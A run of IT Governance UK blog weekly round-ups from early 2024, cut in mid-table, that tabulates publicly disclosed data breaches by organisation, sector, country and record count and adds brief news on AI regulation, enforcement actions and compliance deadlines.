DefenceIsraelYes“thousands”
Orthopedics Associates of Flower Mound
Source 1; source 2; source 3
(Update)
HealthcareUSAYes1,759
UC San Diego Health
Source 1; source 2
(New)
HealthcareUSAYes1,642
Homeaglow
Source
(New)
IT servicesUSAYes1,556
California Correctional Health Care Services
Source 1; source 2
(New)
HealthcareUSAYes1,348
Ascend Healthcare Inc
Source 1; source 2
(New)
HealthcareUSAYes791
Cypress Capital Group, Inc.
Source
(New)
FinanceUSAYes756
Community Health Group Partnership Plan
Source 1; source 2
(New)
InsuranceUSAYes708
Seaglass Chiropractic
Source 1; source 2
(New)
HealthcareUSAYes650
Lindsay Municipal Hospital
Source 1; source 2
(New)
HealthcareUSAYes500
Massachusetts Department of Developmental Services
Source 1; source 2
(New)
PublicUSAYes500
Mercy Home for Children
Source
(New)
HealthcareUSAYes356
Gnome Landscapes & Design
Source 1; source 2
(Update)
Professional servicesUSAYes356
Mintlify
Source
(New)
SoftwareUSAYes91
TD
Source
(New)
FinanceUSAYes4
Goed
Source
(New)
HealthcareBelgiumYesUnknown
Spa Gran Prix
Source
(New)
LeisureBelgiumYesUnknown
Grupo Equatorial Energia
Source
(New)
UtilitiesBrazilYesUnknown
Giant Tiger
Source
(New)
RetailCanadaYesUnknown
Radiant Logistics Inc.
Source
(New)
TransportCanadaYesUnknown
Dongguan Southstar Electronics Limited
Source
(New)
ManufacturingChinaYesUnknown
SCHOKINAG-Schokolade-Industrie GmbH
Source
(New)
ManufacturingGermanyYesUnknown
The Railways of Islamic Republic of Iran (RAI)
Source
(New)
TransportIranYesUnknown
IronRock Insurance Company Limited
Source
(New)
InsuranceJamaicaYesUnknown
The Pokémon Company
Source
(New)
LeisureJapanYesUnknown
The London Clinic
Source 1; source 2
(New)
HealthcareUKYesUnknown
Ultra Electronics Group
Source
(New)
ManufacturingUKYesUnknown
Kolbe Striping, Inc
Source
(New)
ConstructionUSAYesUnknown
Dolomite
Source
(New)
CryptoUSAYesUnknown
Lewis & Clark College
Source
(New)
EducationUSAYesUnknown
St. Mary Parish School Board
Source
(New)
EducationUSAYesUnknown
Fiduciary Outsourcing, LLC
Source
(New)
FinanceUSAYesUnknown
M&D Capital
Source 1; source 2
(New)
FinanceUSAYesUnknown
Aveanna Healthcare
Source 1; source 2
(New)
HealthcareUSAYesUnknown
Commonwealth Healthcare Corporation
Source
(New)
HealthcareUSAYesUnknown
EMSA (Emergency Medical Services Authority)
Source
(New)
HealthcareUSAYesUnknown
Jordano’s Inc.
Source 1; source 2
(New)
HospitalityUSAYesUnknown
BioLife Plasma Services
Source
(New)
ManufacturingUSAYesUnknown
Crinetics Pharmaceuticals
Source 1; source 2
(New)
ManufacturingUSAYesUnknown
I.A.T.S.E. National Benefit Funds
Source
(New)
Non-profitUSAYesUnknown
Ampersand
Source 1; source 2
(New)
Professional servicesUSAYesUnknown
Henry County, VA
Source
(New)
PublicUSAYesUnknown
Arx Capital
Source 1; source 2
(New)
Real estateUSAYesUnknown
MarineMax
Source 1; source 2; source 3
(Update)
RetailUSAYesUnknown
70 organisations, including 48 government organisations
Source
(New)
Public and unknownMultipleYesUnknown
Bundeskriminalamt
Source
(New)
LegalGermanyUnknownUnknown
Polycab India Limited
Source
(New)
ManufacturingIndiaUnknownUnknown
REG.RU
Source
(New)
IT servicesRussiaUnknownUnknown
Pension Fund of Ukraine
Source
(New)
PublicUkraineUnknownUnknown
KIM (Kaluska informatsiyna merezha LLC)
Source 1; source 2
(New)
TelecomsUkraineUnknownUnknown
Linktelecom
Source
(New)
TelecomsUkraineUnknownUnknown
Мисто-ТВ
Source
(New)
TelecomsUkraineUnknownUnknown
Triacom
Source 1; source 2
(New)
TelecomsUkraineUnknownUnknown
Apex Legends Global Series
Source
(New)
LeisureUSAUnknownUnknown
City of Pensacola Government
Source
(New)
PublicUSAUnknownUnknown
Giorgia Meloni’s Instagram account
Source
(New)
PublicItalyNo0
gouvernement.lu
Source 1; source 2
(New)
PublicLuxembourgNo0
MyGuichet.lu
Source 1; source 2
(New)
PublicLuxembourgNo0
dormakaba
Source
(New)
RetailSwitzerlandNo0
Rt Hon. Grant Shapps MP’s RAF Dassault Falcon 900 jet
Source
(New)
TransportUKNo0

Note 1: ‘New’/‘Update’ in the first column refers to whether this breach was first publicly disclosed this week, or whether a significant update was released this week. The updated data point is italicised in the table.

Note 2: For incidents where we only know the file size of the data breached, we use the formula 1 MB = 1 record. Given that we can’t know the exact numbers, as it depends on the types of records included (e.g. pictures and medical histories are considerably larger files than just names and addresses), we err on the side of caution by using this formula. We believe that this underestimates the records breached in most cases, but it is more accurate than not providing a number at all.


AI

Microsoft research finds 87% of UK organisations vulnerable to cyber attacks in the age of AI

A new report by Microsoft, in collaboration with Dr Chris Brauer of Goldsmiths, University of London classed 87% of UK organisations as vulnerable to cyber attacks. Mission Critical: Unlocking the UK AI Opportunity Through Cybersecurity states that the UK must cement its position as a “cybersecurity superpower” in order to realise its ambition of becoming a global “AI superpower”.

Google VLOGGER generates video from photos, raising security concerns

Google researchers have unveiled VLOGGER, an AI model that can generate photorealistic videos of people from photographs and audio samples. However, security professionals have expressed concern about the technology’s potential misuse to create deepfakes that could be used for social engineering attacks.


Enforcement

Nemesis Market darknet marketplace shut down

The Office of the Public Prosecutor General in Frankfurt am Main – Central Office for Combating Cybercrime – and the German Federal Criminal Police Office have seized the server infrastructure of the darknet marketplace Nemesis Market, along with €94,000 in cryptocurrency.

US House of Representatives passes bill to block sale of US data to foreign adversaries

The House of Representatives has unanimously voted in favour of a bill to block data brokers from selling US citizens’ data to foreign adversaries.

“Today’s overwhelming vote sends a clear message that we will not allow our adversaries to undermine American national security and individual privacy by purchasing people’s personally identifiable sensitive information from data brokers,” said House Energy and Commerce Committee leaders Cathy McMorris Rodgers and Frank Pallone in a joint statement. 


Other news

UK accuses China of two malicious cyber campaigns

The UK’s deputy prime minister, Oliver Dowden, has officially blamed the 2021–22 attacks on the UK’s Electoral Commission and parliamentarians on “China state-affiliated actors”.

ICO publishes new fining guidance

The UK’s data protection authority, the ICO (Information Commissioner’s Office), has published new data protection fining guidance, setting out how it calculates fines.

The ICO’s director of legal service, Tim Capel, said: “We believe the guidance will provide certainty and clarity for organisations. It shows how we reach one of our most important decisions as a regulator by explaining when, how and why we would issue a fine for a breach of the UK General Data Protection Regulation or Data Protection Act 2018.”

ISACA® qualification chosen by NCSC as part of GovAssure

ISACA’s® CISA (Certified Information Security Auditor) qualification has been chosen by the NCSC as an industry-leading standard and qualifying criterion for companies licensed to conduct assurance reviews of government organisations, as part of its new cyber assurance regime for government systems, GovAssure.


Recently published reports


Key dates

21 March 2024 – Old EU Standard Contractual Clauses expired

If you transfer data using old EU standard contractual clauses issued under the Data Protection Directive 1995, the deadline to replace them was 21 March 2024. The ICO website provides further information.

31 March 2024 – PCI DSS v4.0 transitioning deadline

Version 3.2.1 of the PCI DSS (Payment Card Industry Data Security Standard) is being retired on 31 March, to be replaced by version 4.0 of the Standard. There are more than 50 new requirements in PCI DSS v4.0. You can find out more about them on the PCI Security Standards Council’s website.

30 April 2024 – ISO/IEC 27001:2013 certification unavailable

Certification bodies must stop offering (re)certification to ISO 27001:2013 by 30 April. The new iteration of the Standard, ISO 27001:2022, isn’t significantly different from ISO 27001:2013, but there are some notable changes. Learn more about complying with ISO 27001:2022.


That’s it for this week’s round-up. We hope you found it useful.

We’ll be back next week Tuesday with the biggest and most interesting news stories, all rounded up in one place. Until then, have a good Easter.

In the meantime, if you missed it, check out last week’s round-up. Alternatively, you can view our full archive.


Security Spotlight

To get news of the latest data breaches and cyber attacks straight to your inbox, subscribe to our weekly newsletter: the Security Spotlight.

Every Wednesday, you’ll get a 4-minute email with:

  • Industry news, including this weekly round-up;
  • Our latest research and statistics;
  • Interviews with our experts, sharing their insights and expertise;
  • Free useful resources; and
  • Upcoming webinars.

The post The Week in Cyber Security and Data Privacy: 18 – 24 March 2024 appeared first on IT Governance UK Blog.

]]>
The Week in Cyber Security and Data Privacy: 11 – 17 March 2024 https://www.itgovernance.co.uk/blog/the-week-in-cyber-security-and-data-privacy-11-17-march-2024 Mon, 18 Mar 2024 17:37:00 +0000 https://www.itgovernance.co.uk/blog/?p=46165 65,583,602 known records breached in 127 newly disclosed incidents Welcome to this week’s global round-up of the biggest and most interesting news stories. At the end of each month, these incidents – and any others that we find – will be used to inform our monthly analysis of data breaches and cyber attacks. Publicly disclosed data breaches and cyber attacks: in the spotlight 73,481,539 records from alleged AT&T breach offered for sale A threat actor known as MajorNelson has listed more than 70 million data records on a dark web forum, claiming it to be data originally exfiltrated from AT&T

The post The Week in Cyber Security and Data Privacy: 11 – 17 March 2024 appeared first on IT Governance UK Blog.

]]>
65,583,602 known records breached in 127 newly disclosed incidents

Welcome to this week’s global round-up of the biggest and most interesting news stories.

At the end of each month, these incidents – and any others that we find – will be used to inform our monthly analysis of data breaches and cyber attacks.


Publicly disclosed data breaches and cyber attacks: in the spotlight

73,481,539 records from alleged AT&T breach offered for sale

A threat actor known as MajorNelson has listed more than 70 million data records on a dark web forum, claiming it to be data originally exfiltrated from AT&T by a threat actor known as ShinyHunters in 2021.

The data includes names, addresses and mobile phone numbers, as well as encrypted birth dates and Social Security numbers.

AT&T has denied the breach since 2021. However, numerous researchers, including Dark Web Informer and vx-underground, have confirmed that the data does indeed relate to AT&T customers.

Data breached: 73,481,539 records.

France Travail and Cap Emploi breach affects 43 million

The French data protection authority, the CNIL, reports that the unemployment agencies France Travail (formerly Pôle emploi) and Cap Emploi have suffered a cyber attack that led to the exposure of 43 million people’s data.

According to France Travail, the breached data includes names, dates of birth, email and postal addresses, telephone numbers, social security numbers and France Travail identifiers. Passwords and bank details were not affected.

Last August, Pôle emploi suffered a data breach affecting 10 million people. At the time, the security firm Emsisoft attributed it to May 2023’s MOVEit Transfer breach, but removed the agency from its list of MOVEit victims the following month. It’s not known whether this breach relates to the MOVEit one.

Data breached: 43 million people’s data.

HIBP adds almost 3.3 million ClickASnap records to its database

In October 2022, ClickASnap announced that it had suffered a data breach on 24 September of that year, in which user emails were stolen from a database.

Have I Been Pwned has now added 3,262,980 records to its database, including email addresses, names, passwords, physical addresses, purchases, social media profiles and usernames.

Data breached: 3,262,980 records.


Publicly disclosed data breaches and cyber attacks: full list

This week, we found 65,583,602 records known to be compromised, and 127 organisations suffering a newly disclosed incident. 79 of them are known to have had data exfiltrated, exposed or otherwise breached. Only 37 definitely haven’t had data breached.

We also found 11 organisations providing a significant update on a previously disclosed incident.

Organisation(s)SectorLocationData breached?Known data breached
AT&T
Source 1; source 2
(Update)
TelecomsUSAYes73,481,539
France Travail and Cap Emploi
Source 1; source 2
(New)
PublicFranceYes43,000,000
ClickASnap
Source 1; source 2
(Update)
IT servicesUKYes3,262,980
AMMEGA
Source
(New)
ManufacturingNetherlandsYes3 TB
MediaWorks NZ
Source 1; source 2
(New)
MediaNew ZealandYes2,461,000
Kids Empire
Source
(New)
LeisureUSAYes2,363,222
Plymouth Tube Company
Source
(New)
ManufacturingUSAYes1.83 TB
GPAA (Government Pensions Administration Agency)
Source 1; source 2
(New)
PublicSouth AfricaYes1.08 TB
Health Service Executive
Source
(New)
HealthcareIrelandYes>1,000,000
Teupe Gruppe
Source
(New)
ConstructionGermanyYes>1 TB
Cleshar
Source
(New)
TransportUKYes1 TB
OYAK
Source
(New)
FinanceTurkeyYes720 GB
Flipkart
Source 1; source 2
(Update)
IT servicesIndiaYes552,094
Reny Picot
Source
(New)
ManufacturingSpainYes350 GB
Instituto Tecnológico Superior de Atlixco, CECyTE Morelos, Municipio de San Andrés Cholula, Departamento de Farmacología, FacMed, UNAM, and others
Source
(New)
Education, public and othersMexicoYes250 GB
GLG (Gerson Lehrman Group)
Source
(New)
Professional servicesUSAYes152,621
Rashim LTD and Israeli universities, including Sapir College, Sakhnin College and the Policy Academy in Beit Shemesh
Source 1; source 2
(New)
Software and educationIsraelYes120 GB
Prince George County Public Schools
Source
(New)
EducationUSAYes117,785
Zapping
Source
(New)
LeisureChileYes>100,000
Saint Louis University
Source
(New)
EducationUSAYes93,612
Nations Direct Mortgage
Source
(New)
FinanceUSAYes83,108
Bradford-Scott Data, Massachusetts Family Credit Union, Methuen Federal Credit Union, Priority Plus Federal Credit Union, StagePoint Federal Credit Union,  Wellness Federal Credit Union and Community Credit Union of New Milford
Source 1; source 2
(Update)
IT services and financeUSAYes43,414
CCM Health
Source
(New)
HealthcareUSAYes29,182
Stanford University Department of Public Safety
Source 1; source 2
(Update)
EducationUSAYes27,000
Eland Energy, Inc.
Source
(New)
EnergyUSAYes18,237
Precision Tune Auto Care
Source 1; source 2
(Update)
ManufacturingUSAYes15,633
Teleflora
Source 1; source 2
(Update)
ManufacturingUSAYes12,635
The Biltmore Company
Source
(New)
RetailUSAYes11,530
Rudman Winchell
Source
(New)
LegalUSAYes11,327
Double Eagle Energy Holdings IV LLC
Source 1; source 2
(Update)
EnergyUSAYes9,040
Faculty of Exact, Physical and Natural Sciences at  Universidad de Córdoba
Source
(New)
EducationArgentinaYes8,841
Texas Health and Human Services
Source
(New)
PublicUSAYes3,392
Universidad de Córdoba
Source
(New)
EducationArgentinaYes2,858
Ada Technologies Incorporated
Source 1; source 2
(New)
ManufacturingUSAYes2,398
KMJ Health Solutions
Source 1; source 2
(New)
IT servicesUSAYes2,191
ACR Electronics, Inc.
Source
(New)
ManufacturingUSAYes2,045
Grow Financial Federal Credit Union
Source
(New)
FinanceUSAYes1,635
Bay Surgical Specialists
Source 1; source 2
(New)
HealthcareUSAYes1,505
Orsini Specialty Pharmacy
Source 1; source 2
(New)
ManufacturingUSAYes1,433
BlueCross BlueShield of Tennessee, Inc. and Volunteer State Health Plan, Inc. d/b/a BlueCare Plus Tennessee
Source 1; source 2
(Update)
InsuranceUSAYes1,251
Taft Stettinius & Hollister LLP
Source
(New)
LegalUSAYes641
Oakland Community Health Network
Source 1; source 2
(New)
HealthcareUSAYes607
East Side Health District
Source 1; source 2
(New)
HealthcareUSAYes559
Lake of the Woods County Department of Social Services
Source 1; source 2
(New)
PublicUSAYes537
Jewish Home Lifecare
Source 1; source 2
(New)
HealthcareUSAYes501
Khorfakkan Municipality
Source
(New)
PublicUAEYes369
Four Seasons Sales & Service
Source
(New)
RetailUSAYes269
RPS Defense
Source
(New)
ManufacturingUSAYes213
Port City Air
Source
(New)
TransportUSAYes125
West Chester University of Pennsylvania
Source
(New)
EducationUSAYes>36
MSI United States and DonorPerfect
Source
(New)
Non-profit and softwareUSAYes24
Northeast Credit Union
Source
(New)
FinanceUSAYes9
Intuit
Source
(New)
SoftwareUSAYes1
Mozaic
Source
(New)
CryptoBritish Virgin IslandsYesUnknown
ZSB & Company Professional Corporation
Source
(New)
FinanceCanadaYesUnknown
Journey Freight International
Source
(New)
TransportCanadaYesUnknown
ADOM Salud
Source
(New)
HealthcareColombiaYesUnknown
Dörr Group
Source
(New)
RetailGermanyYesUnknown
VOID Interactive
Source
(New)
SoftwareIrelandYesUnknown
The Lebanese Organization for Studies and Training
Source
(New)
Non-profitLebanonYesUnknown
FGV Holdings Berhad
Source
(New)
ManufacturingMalaysiaYesUnknown
AirAsia
Source
(New)
TransportMalaysiaYesUnknown
Banregio
Source
(New)
FinanceMexicoYesUnknown
Topa Partners Ltd
Source
(New)
Professional servicesNew ZealandYesUnknown
Ministerio de Educación del Perú
Source
(New)
PublicPeruYesUnknown
Acer Philippines
Source
(New)
ManufacturingPhilippinesYesUnknown
Brooks Tropicals
Source
(New)
AgriculturalUSAYesUnknown
DHanis ISD
Source
(New)
EducationUSAYesUnknown
Scranton School District
Source
(New)
EducationUSAYesUnknown
Encina Wastewater Authority
Source
(New)
EnvironmentalUSAYesUnknown
ATMCo
Source
(New)
FinanceUSAYesUnknown
EquiLend
Source 1; source 2; source 3
(Update)
FinanceUSAYesUnknown
Orthopedics Associates of Flower Mound
Source 1; source 2
(New)
HealthcareUSAYesUnknown
Rancho Medical Family Group
Source 1; source 2
(New)
HealthcareUSAYesUnknown
St. Rose Dominican Hospitals (Rose de Lima)
Source 1; source 2
(New)
HealthcareUSAYesUnknown
Facey Goss & McPhee P.C.
Source
(New)
LegalUSAYesUnknown
International Monetary Fund
Source
(New)
PublicUSAYesUnknown
Wyoming Financial Group (WERCS)
Source
(New)
Real estateUSAYesUnknown
The North Face
Source
(New)
RetailUSAYesUnknown
Opus Match
Source
(New)
SoftwareUSAYesUnknown
R1 RCM
Source 1; source 2
(New)
SoftwareUSAYesUnknown
Jonathan Katz (former manager of a telecoms company from Burlington County, New Jersey)
Source
(New)
TelecomsUSAYesUnknown
edpnet België
Source
(New)
TelecomsBelgiumUnknownUnknown
Town of Huntsville
Source
(New)
PublicCanadaUnknownUnknown
Prensa Latina TV
Source
(New)
MediaCubaUnknownUnknown
Petroltecnica S.p.A.
Source
(New)
EnvironmentalItalyUnknownUnknown
Fujitsu
Source
(New)
IT servicesJapanUnknownUnknown
Meduza
Source
(New)
MediaLatviaUnknownUnknown
Russian polling stations
Source
(New)
PublicRussiaUnknownUnknown
Moscow Metro
Source
(New)
TransportRussiaUnknownUnknown
NHS Dumfries & Galloway
Source 1; source 2
(New)
HealthcareUKUnknownUnknown
Option Care Health
Source
(New)
HealthcareUSAUnknownUnknown
CHRG
Source
(New)
HospitalityAustraliaNo0
Dozens of Estonian government institutions
Source
(New)
PublicEstoniaNo0
8 French government agencies
Source 1; source 2
(New)
PublicFranceNo0
Liverpool John Lennon Airport
Source
(New)
TransportUKNo0
Multiple Alabama government agencies
Source
(New)
PublicUSANo0
MarineMax
Source
(New)
RetailUSANo0

Note 1: ‘New’/‘Update’ in the first column refers to whether this breach was first publicly disclosed this week, or whether a significant update was released this week. The updated data point is italicised in the table.

Note 2: For incidents where we only know the file size of the data breached, we use the formula 1 MB = 1 record. Given that we can’t know the exact numbers, as it depends on the types of records included (e.g. pictures and medical histories are considerably larger files than just names and addresses), we err on the side of caution by using this formula. We believe that this underestimates the records breached in most cases, but it is more accurate than not providing a number at all.


AI

MEPs adopt Artificial Intelligence Act

The European Parliament has endorsed the EU Artificial Intelligence Act, with 523 MEPs voting in favour and 46 against the Act. There were 49 abstentions.

The Act “aims to protect fundamental rights, democracy, the rule of law and environmental sustainability from high-risk AI, while boosting innovation and establishing Europe as a leader in the field”. It also “establishes obligations for AI based on its potential risks and level of impact”.

Garante launches investigation info Open AI’s Sora

Italy’s data protection authority, the Garante per la Protezione dei Dati Personali, has announced that it is investigating Open AI following the launch of a new AI model called Sora, which is capable of creating videos from short textual instructions. The Garante is considering the possible implications Sora could have on the processing of EU residents’ personal data.


Enforcement

European Commission’s use of Microsoft 365 infringes data protection law

The EDPS (European Data Protection Supervisor) has announced that it has found the European Commission’s use of Microsoft 365 infringed several data protection provisions that apply to EUIs (EU institutions, bodies, offices and agencies), including ensuring that personal data transferred outside the EEA is subject to appropriate safeguards.

LockBit associate pleads guilty to cyber extortion

Mikhail Vasiliev, a hacker awaiting extradition from Canada to the US on cyber crime charges, has pleaded guilty to eight counts of cyber extortion, mischief and weapons charges. Vasiliev was arrested over a year ago for committing crimes in connection with the LockBit ransomware group.

Justice officials say Vasiliev took tens of millions of dollars in ransom payments from at least 1,000 ransomware attacks.

Meanwhile, LockBit’s purported leader has vowed to continue its ransomware attacks, despite the massive law enforcement operation that disrupted the group earlier this year.

Polish supervisory authority issues two €24,000 fines for data breach notification failures

Poland’s data protection authority, the UODO (Urząd Ochrony Danych Osobowych), fined two organisations last year for failing to notify it of personal data breaches.

According to the EDPB (European Data Protection Board), the UODO fined an insurance company €24,000 in October 2023 after an unauthorised recipient received an email that was sent in error. The email’s attachment contained personal data belonging to an insurance claimant.

The UODO also fined the District Court in Krakow the same amount in December 2023 after it sent a package containing personal data to the Minister of Foreign Affairs, which arrived damaged and incomplete. The Court, which was the data controller in this instance, failed to notify the supervisory authority of the breach.


Other news

noyb complains that Swedish data broker uses legal loophole to evade GDPR

The privacy rights campaign group noyb has filed a complaint against one of Sweden’s largest data brokers, MrKoll. Noyb argues that MrKroll’s use of a media licence unfairly exempts it from its obligations under the GDPR (General Data Protection Regulation), depriving “people of their fundamental right to privacy and [exposing] their most intimate data to the internet”.

ICO publishes view on DPDI Bill

The ICO (Information Commissioner’s Office) has published its view on the government’s DPDI (Data Protection and Digital Information Bill) as it reaches the Lords committee stage. The Bill aims to reform data protection law in the UK.

Browsers add extra protection to help secure users

Google has announced that Chrome will now use real-time Safe Browsing protections to show warnings when users visit potentially unsafe websites.

And Microsoft has announced that new security protections in Edge and other Chromium-based browsers will prevent criminal hackers from using an exploit in a Renderer Process to escape the Renderer sandbox. This will prevent “attackers from using an exploit to enable the Mojo JavaScript bindings (MojoJS) for their site context within the Renderer”.


Key dates

31 March 2024 – PCI DSS v4.0 transitioning deadline 

Version 3.2.1 of the PCI DSS (Payment Card Industry Data Security Standard) is being retired on 31 March, to be replaced by version 4.0 of the Standard. There are more than 50 new requirements in PCI DSS v4.0. You can find out more about them on the PCI Security Standards Council’s website.

30 April 2024 – ISO/IEC 27001:2013 certification unavailable

Certification bodies must stop offering (re)certification to ISO 27001:2013 by 30 April. The new iteration of the Standard, ISO 27001:2022, isn’t significantly different from ISO 27001:2013, but there are some notable changes. Learn more about complying with ISO 27001:2022.


That’s it for this week’s round-up. We hope you found it useful.

We’ll be back next week with the biggest and most interesting news stories, all rounded up in one place.

In the meantime, if you missed it, check out last week’s round-up. Alternatively, you can view our full archive.


Security Spotlight

To get news of the latest data breaches and cyber attacks straight to your inbox, subscribe to our weekly newsletter: the Security Spotlight.

Every Wednesday, you’ll get a 4-minute email with:

  • Industry news, including this weekly round-up;
  • Our latest research and statistics;
  • Interviews with our experts, sharing their insights and expertise;
  • Free useful resources; and
  • Upcoming webinars.

The post The Week in Cyber Security and Data Privacy: 11 – 17 March 2024 appeared first on IT Governance UK Blog.

]]>
The Week in Cyber Security and Data Privacy: 19 – 25 February 2024 https://www.itgovernance.co.uk/blog/the-week-in-cyber-security-and-data-privacy-19-25-february-2024 Tue, 27 Feb 2024 14:24:49 +0000 https://www.itgovernance.co.uk/blog/?p=46084 18,267,244 known records breached in 94 newly disclosed incidents Welcome to this week’s global round-up of the biggest and most interesting news stories. At the end of each month, these incidents – and any others that we find – will be used to inform our monthly analysis of data breaches and cyber attacks. Publicly disclosed data breaches and cyber attacks: in the spotlight loanDepot reports an extra 324,071 victims In January, the mortgage lender loanDepot announced in an SEC filing that an unauthorised third party had gained access to the sensitive personal information of about 16.6 million individuals in its

The post The Week in Cyber Security and Data Privacy: 19 – 25 February 2024 appeared first on IT Governance UK Blog.

]]>
18,267,244 known records breached in 94 newly disclosed incidents

Welcome to this week’s global round-up of the biggest and most interesting news stories.

At the end of each month, these incidents – and any others that we find – will be used to inform our monthly analysis of data breaches and cyber attacks.


Publicly disclosed data breaches and cyber attacks: in the spotlight

loanDepot reports an extra 324,071 victims

In January, the mortgage lender loanDepot announced in an SEC filing that an unauthorised third party had gained access to the sensitive personal information of about 16.6 million individuals in its systems.

In a new breach notification to the Maine Attorney General this week, it reported that an extra 324,071 individuals were affected. The breached data includes names, addresses, emails, phone numbers, dates of birth, and financial account and Social Security numbers.

Data breached: 16,924,071 individuals’ data.

The Colorado Department of Health Care Policy & Financing reports a further 473,936 victims

Last October, the Colorado Department of Health Care Policy & Financing notified the Maine Attorney General of a breach affecting 4,187,732 people. The incident was caused by the MOVEit Transfer vulnerability.

This week, the Department informed the Maine regulator that an additional 474,936 individuals were impacted. The breached data may include names, Social Security numbers and health insurance information.

Data breached: 4,662,668 individuals’ data.

2,350,236 individuals’ health data compromised in American Vision Partners breach

Medical Management Resource Group, L.L.C. (doing business as American Vision Partners), an eye care practitioner with more than 100 eye care centres across the US, reported a data breach affecting 2,350,236 people.

For all individuals, the breached data included names, contact details, dates of birth and medical information. For some victims, the stolen data also included Social Security numbers and health insurance information.

Data breached: 2,350,236 individuals’ data.


Publicly disclosed data breaches and cyber attacks: full list

This week, we found 18,267,244 records known to be compromised, and 94 organisations suffering a newly disclosed incident. 86 of them are known to have had data exfiltrated, exposed or otherwise breached. None definitely haven’t had data breached.

We also found 4 organisations providing a significant update on a previously disclosed incident.

Organisation(s)SectorLocationData breached?Known data breached
loanDepot
Source 1; source 2
(Update)
FinanceUSAYes16,924,071
Colorado Department of Health Care Policy & Financing
Source 1; Source 2
(Update)
PublicUSAYes4,662,668
Medical Management Resource Group, L.L.C. (American Vision Partners)
Source 1; source 2; source 3
(New)
HealthcareUSAYes2,350,236
March Construction
Source
(New)
ConstructionUSAYes1.8 TB
Roncelli Plastics
Source
(New)
ManufacturingUSAYes1.6 TB
The Peddie School
Source
(New)
EducationUSAYes1.2 TB
Newman Ferrara
Source
(New)
LegalUSAYes835 GB
UNITE HERE
Source
(Update)
Professional servicesUSAYes791,273
First Professional Services
Source
(New)
HealthcareUSAYes755 GB
BS&B Safety Systems
Source
(New)
ManufacturingUSAYes714.9 GB
Grand Paris Aménagement
Source
(New)
ConstructionFranceYes653.8 GB
Climatech
Source
(New)
ManufacturingUSAYes550 GB
VSP Dental
Source
(New)
HealthcareUSAYes543 GB
Human Resources Technologies
Source
(New)
IT servicesUSAYes500 GB
Dilweg
Source
(New)
FinanceUSAYes453 GB
Spine West
Source
(New)
HealthcareUSAYes450 GB
Wapiti Energy
Source
(New)
EnergyUSAYes436.3 GB
Birchall Foodservice
Source
(New)
HospitalityUKYes405 GB
Zircodata
Source
(New)
IT servicesAustraliaYes395 GB
Wangkanai Group
Source
(New)
ManufacturingThailandYes350 GB
Family Health Center
Source
(New)
HealthcareUSAYes327 GB
US Merchants
Source
(New)
ManufacturingUSAYes245 GB
Tangerine
Source
New
TelecomsAustraliaYes232,000
Remkes Poultry
Source
(New)
ManufacturingNetherlandsYes190 GB
Hardeman County Community Health Center
Source
(New)
HealthcareUSAYes169 GB
CarePro
Source 1; source 2
(New)
HealthcareUSAYes151,499
Farmacia al Shefa
Source
(New)
HealthcareRomaniaYes150 GB
Quik Pawn Shop
Source
(New)
FinanceUSAYes140 GB
Bucher and Strauss
Source
(New)
FinanceSwitzerlandYes140 GB
Prime Healthcare Employee Health Plan
Source 1; source 2
(New)
HealthcareUSAYes101,135
Apex Internationale Spedition
Source
(New)
TransportGermanyYes100 GB
Bram Auto Group
Source
(New)
ManufacturingUSAYes85 GB
Town of Greater Napanee
Source
(New)
PublicCanadaYes82.9 GB
Tiete Automobile
Source
(New)
RetailBrazilYes68.5 GB
Delia Cosmetics
Source
(New)
ManufacturingPolandYes64 GB
Rapid Granulator
Source
(New)
ManufacturingSwedenYes60 GB
medQ, Inc.
Source
(New)
HealthcareUSAYes54,353
Advanced Project Solutions
Source
(New)
IT servicesUSAYes54 GB
Greater Cincinnati Behavioral Health Services
Source 1; source 2
(Update)
HealthcareUSAYes50,000
Compression Leasing Services
Source
(New)
ManufacturingUSAYes41.11 GB
Washington County Hospital and Nursing Home
Source
(New)
HealthcareUSAYes31,125
Crossroads Equipment Lease & Finance, LLC
Source
(New)
FinanceUSAYes24,182
EdisonLearning, Inc.
Source
(New)
EducationUSAYes23,922
DTS (Desarrollo de Tecnologia y Sistemas)
Source
New
IT servicesChileYes20 GB
Peer Consultants
Source
(New)
Professional servicesUSAYes20 GB
Wyze
Source
(New)
IT servicesUSAYes13,000
Bay Area Heart Center
Source 1; source 2
(New)
HealthcareUSAYes11,709
Westward360
Source
(New)
Real estateUSAYes11 GB
Greylock McKinnon Associates, Inc.
Source
(New)
LegalUSAYes5,465
Bacon-Universal Holdings, LLC
Source
(New)
ConstructionUSAYes3,561
T.Y. Lin International Group Ltd.
Source
(New)
EngineeringUSAYes3,398
GC Services
Source
(New)
FinanceUSAYes3,043
CVS Pharmacy, Inc.
Source 1; source 2
(New)
HealthcareUSAYes1,896
Matthews International
Source
(New)
ManufacturingUSAYes1,846
Pond & Company
Source
(New)
EngineeringUSAYes1,495
Brazee & Huban CPAs
Source
(New)
FinanceUSAYes1,119
BlueCross BlueShield of Tennessee, Inc. and Volunteer State Health Plan, Inc. d/b/a BlueCare Plus Tennessee
Source 1; source 2
(New)
HealthcareUSAYes790
Roswell Park Comprehensive Cancer Center
Source 1; source 2
(New)
HealthcareUSAYes755
Capital Health system, Inc.
Source 1; source 2
(New)
HealthcareUSAYes501
Harris Beach PLLC
Source
(New)
LegalUSAYes486
Beauty Essence, Inc.
Source
(New)
LeisureUSAYes409
Walmart, Inc.
Source
(New)
RetailUSAYes204
Xerox Corporation
Source
(New)
Professional servicesUSAYes181
HematoLogics, Inc.
Source
(New)
HealthcareUSAYes99
torchbyte
Source
(New)
TelecomsRomaniaYes45
Australian Department of Finance
Source
(New)
PublicAustraliaYesUnknown
Anxun Information Technology
Source
(New)
Cyber securityChinaYesUnknown
PSI Software
Source
(New)
SoftwareGermanyYesUnknown
Acies SRL
Source
(New)
HealthcareItalyYesUnknown
Grupo Bimbo
Source
(New)
ManufacturingMexicoYesUnknown
Axel Johnson
Source
(New)
ManufacturingSwedenYesUnknown
dasteam ag
Source
(New)
Professional servicesSwitzerlandYesUnknown
Acorn Property Group
Source
(New)
ConstructionUKYesUnknown
Multiple universities using the Janet Network, including Cambridge and Manchester
Source
(New)
EducationUKYesUnknown
Helical Technology
Source
(New)
ManufacturingUKYesUnknown
The Chas. E. Phipps Co
Source
(New)
ConstructionUSAYesUnknown
FixedFloat
Source
(New)
CryptoUSAYesUnknown
Aeromech
Source
New
EngineeringUSAYesUnknown
Bradshaw Medical (intech)
Source
(New)
HealthcareUSAYesUnknown
Maryville Addiction Treatment Center
Source 1; source 2
(New)
HealthcareUSAYesUnknown
Radiology Associates of Ocala
Source
(New)
HealthcareUSAYesUnknown
Infiniti USA
Source
(New)
ManufacturingUSAYesUnknown
Pressco Technology
